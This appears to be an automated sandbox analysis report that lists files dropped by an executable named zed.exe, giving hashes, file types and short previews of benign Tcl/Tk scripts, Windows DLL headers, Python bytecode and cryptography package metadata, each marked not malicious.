                                                                                                                                                                                                                                            Preview:#..# Ttk widget set initialization script...#....### Source library scripts...#....namespace eval ::ttk {.. variable library.. if {![info exists library]} {...set library [file dirname [info script]].. }..}....source -encoding utf-8 [file join $::ttk::library fonts.tcl]..source -encoding utf-8 [file join $::ttk::library cursors.tcl]..source -encoding utf-8 [file join $::ttk::library utils.tcl]....## ttk::deprecated $old $new --..#.Define $old command as a deprecated alias for $new command..#.$old and $new must be fully namespace-qualified...#..proc ttk::deprecated {old new} {.. interp alias {} $old {} ttk::do'deprecate $old $new..}..## do'deprecate --..#.Implementation procedure for deprecated commands --..#.issue a warning (once), then re-alias old to new...#..proc ttk::do'deprecate {old new args} {.. deprecated'warning $old $new.. interp alias {} $old {} $new.. uplevel 1 [linsert $args 0 $new]..}....## deprecated'warning --..#.Gripe about use of deprecated comman
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8624
                                                                                                                                                                                                                                            Entropy (8bit):5.001791071900077
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:e0ebpSp+IZwnmTmpx8xzaHfw8K7LlJWQl8p7M+R5:rw0+WmpWxa/w9nlJHu
                                                                                                                                                                                                                                            MD5:51086BC3315A4AE4A8591A654CFC3CEA
                                                                                                                                                                                                                                            SHA1:2AC08309C63575B7A01FA62D3C262643CD8C823A
                                                                                                                                                                                                                                            SHA-256:4AA041C050758B3331DC395381F7FBCE81E387908FC7A3C6107C4E7140F56F2E
                                                                                                                                                                                                                                            SHA-512:6D69F7EAC9D5AF3B3EA85AE3E74BDFA6278789502D5E35EFE94349BFC543503BE7540D783D2632E349DD53F21074C702AC1FC487EE70C74234A08397F7238723
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Utilities for widget implementations...#....### Focus management...#..# See also: #1516479..#....## ttk::takefocus --..#.This is the default value of the "-takefocus" option..#.for ttk::* widgets that participate in keyboard navigation...#..# NOTES:..#.tk::FocusOK (called by tk_focusNext) tests [winfo viewable]..#.if -takefocus is 1, empty, or missing; but not if it's a..#.script prefix, so we have to check that here as well...#..#..proc ttk::takefocus {w} {.. expr {[$w instate !disabled] && [winfo viewable $w]}..}....## ttk::GuessTakeFocus --..#.This routine is called as a fallback for widgets..#.with a missing or empty -takefocus option...#..#.It implements the same heuristics as tk::FocusOK...#..proc ttk::GuessTakeFocus {w} {.. # Don't traverse to widgets with '-state disabled':.. #.. if {![catch {$w cget -state} state] && $state eq "disabled"} {...return 0.. }.... # Allow traversal to widgets with explicit key or focus bindings:.. #.. if {[regexp {Key|F
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9710
                                                                                                                                                                                                                                            Entropy (8bit):4.6639701588183895
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:BktY1F+qXd95WSZaHFHRE3GRKFh2oaoT/ezKpqvYMHab:V1F+cd95WSZuhRE34KbPmKmY2ab
                                                                                                                                                                                                                                            MD5:0AA7F8B43C3E07F3A4DA07FC6DF9A1B0
                                                                                                                                                                                                                                            SHA1:153AFB735B10BBA16CFBE161777232F983845D90
                                                                                                                                                                                                                                            SHA-256:EC5F203C69DF390E9B99944CF3526D6E77DC6F68E9B1A029F326A41AFED1EF81
                                                                                                                                                                                                                                            SHA-512:5406553211CD6714C98EF7765ABD46424CCB013343EFF693FDD3AE6E0AAE9B5983446E0E1CC706D6B2C285084BF83D397306D3D52028CBBCFB8F369857C5B69C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Settings for Microsoft Windows Vista and Server 2008..#....# The Vista theme can only be defined on Windows Vista and above. The theme..# is created in C due to the need to assign a theme-enabled function for..# detecting when themeing is disabled. On systems that cannot support the..# Vista theme, there will be no such theme created and we must not..# evaluate this script.....if {"vista" ni [ttk::style theme names]} {.. return..}....namespace eval ttk::theme::vista {.... ttk::style theme settings vista {.... .ttk::style configure . \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -insertcolor SystemWindowText \... -font TkDefaultFont \... ;.....ttk::style map "." \... -foreground [list disabled SystemGrayText] \... ;.....ttk::style configure TButton -anchor center -padding {1 1} -width -11...ttk::style configure TRadiobutton -padding 2...ttk::
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2865
                                                                                                                                                                                                                                            Entropy (8bit):4.917847108902527
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:b69VhW2gL5FPVWRzQsVqrEuF3yYrf7rfJF8xUqBgLt6g3ktO5jo4+iZ6O2htYtCW:bbXl+CEqZNNSxU0Ht2MR7W
                                                                                                                                                                                                                                            MD5:769C0719A4044F91E7D132A25291E473
                                                                                                                                                                                                                                            SHA1:6FB07B0C887D443A43FB15D5728920B578171219
                                                                                                                                                                                                                                            SHA-256:AE82BCCCE708FF9C303CBCB3D4CC3FF5577A60D5B23822EA79E3E07CCE3CBBD1
                                                                                                                                                                                                                                            SHA-512:47FED061DDC6B4EB63EF77901D0094FF2EBB1BAFACB3F44FBF13FB59DEA1EC83985B2862086ECF1A7957819A88A0FAA144B35F16BEA9356BBD9775070D42E636
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Settings for 'winnative' theme...#....namespace eval ttk::theme::winnative {.. ttk::style theme settings winnative {.....ttk::style configure "." \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -fieldbackground SystemWindow \... -insertcolor SystemWindowText \... -troughcolor SystemScrollbar \... -font TkDefaultFont \... ;.....ttk::style map "." -foreground [list disabled SystemGrayText] ;.. ttk::style map "." -embossed [list disabled 1] ;.....ttk::style configure TButton \... -anchor center -width -11 -relief raised -shiftrelief 1...ttk::style configure TCheckbutton -padding "2 4"...ttk::style configure TRadiobutton -padding "2 4"...ttk::style configure TMenubutton \... -padding "8 4" -arrowsize 3 -relief raised.....ttk::style map TButton -relief {{!disabled pressed} sunken}.....ttk::style configure TEntry \... -padding 2 -select
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2103
                                                                                                                                                                                                                                            Entropy (8bit):4.9805308941424355
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:aaiIu89VhW2gLRWJyO514rf+rfzxTrf/MW+iZ6O2htYtCp:XoXAk21nxQ7p
                                                                                                                                                                                                                                            MD5:162F30D2716438C75EA16B57E6F63088
                                                                                                                                                                                                                                            SHA1:3F626FF0496BB16B27106BED7E38D1C72D1E3E27
                                                                                                                                                                                                                                            SHA-256:AEDB21C6B2909A4BB4686837D2126E521A8CC2B38414A4540387B801EBD75466
                                                                                                                                                                                                                                            SHA-512:6EBF9648F1381D04F351BB469B6E3A38F3D002189C92EAF80A18D65632037FF37D34EC8814BBF7FAE34553645BFC13985212F24684EE8C4E205729B975C88C97
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Settings for 'xpnative' theme..#....namespace eval ttk::theme::xpnative {.... ttk::style theme settings xpnative {.....ttk::style configure . \... -background SystemButtonFace \... -foreground SystemWindowText \... -selectforeground SystemHighlightText \... -selectbackground SystemHighlight \... -insertcolor SystemWindowText \... -font TkDefaultFont \... ;.....ttk::style map "." \... -foreground [list disabled SystemGrayText] \... ;.....ttk::style configure TButton -anchor center -padding {1 1} -width -11...ttk::style configure TRadiobutton -padding 2...ttk::style configure TCheckbutton -padding 2...ttk::style configure TMenubutton -padding {8 4}.....ttk::style configure TNotebook -tabmargins {2 2 2 0}...ttk::style map TNotebook.Tab \... -expand [list selected {2 2 2 2}].....ttk::style configure TLabelframe.Label -foreground "#0046d5".....# OR: -padding {3 3 3 6}, which some apps seem to use....ttk::style configure TEntry -padding {2 2 2 4}...ttk::
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10521
                                                                                                                                                                                                                                            Entropy (8bit):5.0647027375963996
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:1Y3uWEXm/swEePmJhRAXd1hTHsHG2ML/9Lm2daM0Hu:8hodMiM0Hu
                                                                                                                                                                                                                                            MD5:508F7E258C04970FAE526990168CB773
                                                                                                                                                                                                                                            SHA1:33785204B18C0E0F5CDCB5B49399B5907351FDB8
                                                                                                                                                                                                                                            SHA-256:B463B366F139DDF7FED31F34C6D2341F9F27845A1A358011DFC801E1333B1828
                                                                                                                                                                                                                                            SHA-512:A12985B58DD1D46297119CED47B7F44EF4139CED6C36FD028E66DD657E5ED0663B744C679A5BF7A39B39D17A32E1280D2945F6B9AD59AEF20436F68040F6070C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# unsupported.tcl --..#..# Commands provided by Tk without official support. Use them at your..# own risk. They may change or go away without notice...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# ----------------------------------------------------------------------..# Unsupported compatibility interface for folks accessing Tk's private..# commands and variable against recommended usage...# ----------------------------------------------------------------------....namespace eval ::tk::unsupported {.... # Map from the old global names of Tk private commands to their.. # new namespace-encapsulated names..... variable PrivateCommands.. array set PrivateCommands {...tkButtonAutoInvoke..::tk::ButtonAutoInvoke...tkButtonDown...::tk::ButtonDown...tkButtonEnter...::tk::ButtonEnter...tkButtonInvoke...::tk::ButtonInvoke...tkButtonLeave...::tk::ButtonLeave...tkButtonUp...::tk::ButtonUp...tk
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):26991
                                                                                                                                                                                                                                            Entropy (8bit):4.974180990171971
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:0BLzjXhss64XKNFXm39QJ63nwFiHLgRIdNPCRE5phLtffsNP4XWdxWk+I5oP9jNR:0BvjXoFCB3flLCRE5phLCP3xWq8vWTod
                                                                                                                                                                                                                                            MD5:FA99EF44FAA88A6BA1967A1257DEB97B
                                                                                                                                                                                                                                            SHA1:CC99DBF678F4169A90ACC5A89C6F8DAB48052EC6
                                                                                                                                                                                                                                            SHA-256:C4722EADEDE763FA52E7937D40067B0F8EB86B7A4B707F90212ED3E5289690D0
                                                                                                                                                                                                                                            SHA-512:3AF16095784908A444CD61EEF178A30B9FED9C20AA91D94044A3AECB6047267FB80BCE790FC1F28FB19AEF664A6618FD832612F541FDADCC34B6C01E92E5EA40
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# xmfbox.tcl --..#..#.Implements the "Motif" style file selection dialog for the..#.Unix platform. This implementation is used only if the..#."::tk_strictMotif" flag is set...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Scriptics Corporation..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}......# ::tk::MotifFDialog --..#..#.Implements a file dialog similar to the standard Motif file..#.selection box...#..# Arguments:..#.type.."open" or "save"..#.args..Options parsed by the procedure...#..# Results:..#.When -multiple is set to 0, this returns the absolute pathname..#.of the selected file. (NOTE: This is not the same as a single..#.element list.)..#..#.When -multiple is set to > 0, this returns a Tcl list of absolute..# pathnames. The argument for -multiple is ignored, but for consistency..#
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):66328
                                                                                                                                                                                                                                            Entropy (8bit):6.295486583134031
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:dGpS27sIvGJdk7YeY7S81CpnHcKWlI1OSs7Sy+xe:gpVp7xKSppnHcFlI1OSsz
                                                                                                                                                                                                                                            MD5:E38A6B96F5CC200F21DA22D49E321DA3
                                                                                                                                                                                                                                            SHA1:4EA69D2B021277AB0B473CFD44E4BFD17E3BAC3B
                                                                                                                                                                                                                                            SHA-256:F0EBDF2CA7B33C26B8938EFA59678068D3840957EE79D2B3C576437F8F913F20
                                                                                                                                                                                                                                            SHA-512:3DF55CDD44EA4789FB2DE9672F421B7FF9AD798917417DCB5B1D8575804306FB7636D436965598085D2E87256ECB476ED69DF7AF05986F05B9F4A18EED9629E2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s............jQ...................................j....Ni.....................=..........Rich...........PE..d......f.........." ...(.n...j............................................................`.............................................P.............................../......0......T...............................@............................................text....l.......n.................. ..`.rdata...B.......D...r..............@..@.data... ...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):37656
                                                                                                                                                                                                                                            Entropy (8bit):6.341257574556273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:r/mqQhTcYsjNxO0tI1Ci75YiSyvNhAMxkE9x2:Dm7GFNxO0tI1CiF7SynxRI
                                                                                                                                                                                                                                            MD5:BED7B0CED98FA065A9B8FE62E328713F
                                                                                                                                                                                                                                            SHA1:E329EBCA2DF8889B78CE666E3FB909B4690D2DAA
                                                                                                                                                                                                                                            SHA-256:5818679010BB536A3D463EEEE8CE203E880A8CD1C06BF1CB6C416AB0DC024D94
                                                                                                                                                                                                                                            SHA-512:C95F7BB6CA9AFBA50BF0727E971DFF7326CE0E23A4BFA44D62F2ED67ED5FEDE1B018519DBFA0ED3091D485ED0ACE68B52DD0BB2921C9C1E3BC1FA875CD3D2366
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.L...L...L...E..J.......H.......H.......D...Y...N.......Q.......K...L...........M...Y...M...Y...M...Y...M...Y...M...RichL...........PE..d....f.........." ...(.*...<.......(..............................................@.....`..........................................V..H...HV..................x....d.../......t...dG..T............................C..@............@.......S..@....................text...n(.......*.................. ..`.rdata..4 ...@..."..................@..@.data........p.......P..............@....pdata..x............T..............@..@.rsrc................X..............@..@.reloc..t............b..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1332769
                                                                                                                                                                                                                                            Entropy (8bit):5.586540075838612
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:VHlJGUqQlLmgBvc+fYNXPh26UZWAzyX7j7YQqPQCxf2idmSP/Hg1d2R1RbtRwvw:VHlJGUDa+zy/7UlcidmSPvaMHtRwvw
                                                                                                                                                                                                                                            MD5:242A4D3404414A9E8ED1CA1A72E8039C
                                                                                                                                                                                                                                            SHA1:B1FD68D13CC6D5B97DC3EA8E2BE1144EA2C3ED50
                                                                                                                                                                                                                                            SHA-256:CB98F93EDE1F6825699EF6E5F11A65B00CDBC9FDFB34F7209B529A6E43E0402D
                                                                                                                                                                                                                                            SHA-512:CCA8E18CC41300E204AEE9E44D68FFE9808679B7DBF3BEC9B3885257CADCCFF1DF22A3519CC8DB3B3C557653C98BAC693BF89A1E6314EF0E0663C76BE2BF8626
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:PK..........!./gJ.O...O......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):299427
                                                                                                                                                                                                                                            Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                            MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                            SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                            SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                            SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                                                            Entropy (8bit):4.817893239381772
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:MRv9XFCk2z1/t12iwU5usJFcCyD9cqgE:aVVC5djuUFJKtgE
                                                                                                                                                                                                                                            MD5:71D96F1DBFCD6F767D81F8254E572751
                                                                                                                                                                                                                                            SHA1:E70B74430500ED5117547E0CD339D6E6F4613503
                                                                                                                                                                                                                                            SHA-256:611E1B4B9ED6788640F550771744D83E404432830BB8E3063F0B8EC3B98911AF
                                                                                                                                                                                                                                            SHA-512:7B10E13B3723DB0E826B7C7A52090DE999626D5FA6C8F9B4630FDEEF515A58C40660FA90589532A6D4377F003B3CB5B9851E276A0B3C83B9709E28E6A66A1D32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d... $.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):124928
                                                                                                                                                                                                                                            Entropy (8bit):5.935676608756784
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:BETt3OiaqGB7QNX6Pq4a461TDqFRgMzrOH+d3gdy2iIeP/j3bhouROm:Bmt+is7QNqP1ab1TGb9g/iI4bhouROm
                                                                                                                                                                                                                                            MD5:D8F690EAE02332A6898E9C8B983C56DD
                                                                                                                                                                                                                                            SHA1:112C1FE25E0D948F767E02F291801C0E4AE592F0
                                                                                                                                                                                                                                            SHA-256:C6BB8CAD80B8D7847C52931F11D73BA64F78615218398B2C058F9B218FF21CA9
                                                                                                                                                                                                                                            SHA-512:E732F79F39BA9721CC59DBE8C4785FFD74DF84CA00D13D72AFA3F96B97B8C7ADF4EA9344D79EE2A1C77D58EF28D3DDCC855F3CB13EDDA928C17B1158ABCC5B4A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........yB....................7...............7.......7.......7.......6..........C....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........B.......................................0............`.............................................d.................................... ......@...................................@............P...............................text....>.......@.................. ..`.rdata..PY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5440
                                                                                                                                                                                                                                            Entropy (8bit):5.074342830021076
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DlaQIUQIhQIKQILbQIRIaMPktjaVxsxA2TtLDmplH7dwnqTIvrUmA0JQTQCQx5KN:LcPuP1srTtLDmplH7JTIvYX0JQTQ9x54
                                                                                                                                                                                                                                            MD5:554DC6138FDBF98B7F1EDFE207AF3D67
                                                                                                                                                                                                                                            SHA1:B6C806E2AFF9A0F560916A90F793348DBF0514BA
                                                                                                                                                                                                                                            SHA-256:0064A9B5FD2AC18605E512EF7127318AD9CF259E9445488C169F237A590602E1
                                                                                                                                                                                                                                            SHA-512:3A71B533874F4D0F94F15192791D2FA4DF9E8EBF184C711F1D4FA97230C04764C1C9A93258355B08107E5B72053C6901E883E3DB577E8A204D5B9EB3F8BC7BFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: cryptography.Version: 43.0.1.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15579
                                                                                                                                                                                                                                            Entropy (8bit):5.567434003079107
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bX1ToLbz5jF4E9VqhXJZ4WPB6s7B0Ppz+NX6in5Lqw/I+B:bXeLbhCEsJrPB6s7B0Ppz+96innVB
                                                                                                                                                                                                                                            MD5:E8478B758300439BF58613F2A3A2676C
                                                                                                                                                                                                                                            SHA1:39ED064E67212A54E4B8D1C909E6AD2ACF48025D
                                                                                                                                                                                                                                            SHA-256:5ADEAA62D3045659DDF79324823AA3BCB1CA78F264442D6F6F6B9C8A8470A634
                                                                                                                                                                                                                                            SHA-512:D7029823DC5585FBE885DDB52EED2D02D1584EB945EF23916391201FCBD17DF0B14F338BDFC6E81318297F831CA99796423206F781373857317E068F0C0B321C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:cryptography-43.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-43.0.1.dist-info/METADATA,sha256=AGSptf0qwYYF5RLvcScxitnPJZ6URUiMFp8jelkGAuE,5440..cryptography-43.0.1.dist-info/RECORD,,..cryptography-43.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-43.0.1.dist-info/WHEEL,sha256=8_4EnrLvbhzH224YH8WypoB7HFn-vpbwr_zHlr3XUBI,94..cryptography-43.0.1.dist-info/license_files/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-43.0.1.dist-info/license_files/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-43.0.1.dist-info/license_files/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=pY_pmYXjJTK-LjfCu7ot0NMj0QC2dkD1dCPyV8QjISM,445..cryptography/__init__.py,sha256=mthuUrTd4FROCpUYrTIqhjz6s6T9djAZrV7nZ1oMm2o,364..cryptography/__pycache__/__about__.cpython-312.pyc,,..cryptography/__pycache__/__ini
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94
                                                                                                                                                                                                                                            Entropy (8bit):5.016084900984752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX5pGogP+tkKciH/KQb:RtvoTWKTQb
                                                                                                                                                                                                                                            MD5:C869D30012A100ADEB75860F3810C8C9
